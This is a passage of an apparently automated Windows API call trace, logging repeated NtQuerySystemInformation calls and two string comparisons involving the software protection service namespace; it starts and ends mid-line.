(SystemInformationClass=0xb9, SystemInformation=0xa78217eaa0, Length=0x20, ResultLength=0x0) [0293.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0293.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0293.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0293.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0293.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0293.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0293.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0293.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0293.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0293.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0293.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0293.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb30, Length=0x28, ResultLength=0x0) [0293.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0293.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0293.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb10, Length=0x20, ResultLength=0x0) [0293.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eaa0, Length=0x20, ResultLength=0x0) [0293.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eaa0, Length=0x20, ResultLength=0x0) [0293.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eee0, Length=0x40, ResultLength=0x0) [0293.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eee0, Length=0x40, ResultLength=0x0) [0293.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee00, Length=0x30, ResultLength=0x0) [0293.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee00, Length=0x30, ResultLength=0x0) [0293.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed08, Length=0x30, ResultLength=0x0) [0293.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec70, Length=0x38, ResultLength=0x0) [0293.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea30, Length=0x50, ResultLength=0x0) [0293.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea30, Length=0x50, ResultLength=0x0) [0293.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea30, Length=0x50, ResultLength=0x0) [0293.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e920, Length=0x50, ResultLength=0x0) [0293.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e920, Length=0x50, ResultLength=0x0) [0293.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e920, Length=0x50, ResultLength=0x0) [0293.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e920, Length=0x50, ResultLength=0x0) [0293.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e850, Length=0x38, ResultLength=0x0) [0293.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e680, Length=0x28, ResultLength=0x0) [0293.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e680, Length=0x28, ResultLength=0x0) [0293.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e680, Length=0x28, ResultLength=0x0) [0293.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6f0, Length=0x28, ResultLength=0x0) [0293.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e850, Length=0x38, ResultLength=0x0) [0293.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e850, Length=0x38, ResultLength=0x0) [0293.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6d0, Length=0x20, ResultLength=0x0) [0293.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e660, Length=0x20, ResultLength=0x0) [0293.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e660, Length=0x20, ResultLength=0x0) [0293.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eee0, Length=0x40, ResultLength=0x0) [0293.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eee0, Length=0x40, ResultLength=0x0) [0293.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee00, Length=0x30, ResultLength=0x0) [0293.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee00, Length=0x30, ResultLength=0x0) [0293.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed08, Length=0x30, ResultLength=0x0) [0293.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec70, Length=0x38, ResultLength=0x0) [0293.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0293.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea60, Length=0x28, ResultLength=0x0) [0293.534] _wcsicmp (_String1="SPPSVC\\0ff1ce15-a989-479d-af46-f275c6370663", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0293.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0293.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0293.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0293.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0293.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e840, Length=0x28, ResultLength=0x0) [0293.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e840, Length=0x28, ResultLength=0x0) [0293.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e840, Length=0x28, ResultLength=0x0) [0293.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8b0, Length=0x28, ResultLength=0x0) [0293.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0293.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e930, Length=0x28, ResultLength=0x0) [0293.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e930, Length=0x28, ResultLength=0x0) [0293.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e7d0, Length=0x20, ResultLength=0x0) [0293.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x20, ResultLength=0x0) [0293.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x20, ResultLength=0x0) [0293.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x20, ResultLength=0x0) [0293.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0293.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0293.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e890, Length=0x20, ResultLength=0x0) [0293.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e820, Length=0x20, ResultLength=0x0) [0293.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e820, Length=0x20, ResultLength=0x0) [0293.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eee0, Length=0x40, ResultLength=0x0) [0293.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eee0, Length=0x40, ResultLength=0x0) [0293.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eee0, Length=0x40, ResultLength=0x0) [0293.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee00, Length=0x30, ResultLength=0x0) [0293.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee00, Length=0x30, ResultLength=0x0) [0293.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed08, Length=0x30, ResultLength=0x0) [0293.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec70, Length=0x38, ResultLength=0x0) [0293.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0293.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea60, Length=0x28, ResultLength=0x0) [0293.601] _wcsicmp (_String1="SPPSVC\\0ff1ce15-a989-479d-af46-f275c6370663", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0293.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0293.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0293.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0293.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0293.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e840, Length=0x28, ResultLength=0x0) [0293.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e840, Length=0x28, ResultLength=0x0) [0293.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e840, Length=0x28, ResultLength=0x0) [0293.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8b0, Length=0x28, ResultLength=0x0) [0293.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0293.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e930, Length=0x28, ResultLength=0x0) [0293.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e930, Length=0x28, ResultLength=0x0) [0293.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e7d0, Length=0x20, ResultLength=0x0) [0293.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x20, ResultLength=0x0) [0293.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x20, ResultLength=0x0) [0293.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x20, ResultLength=0x0) [0293.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0293.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, 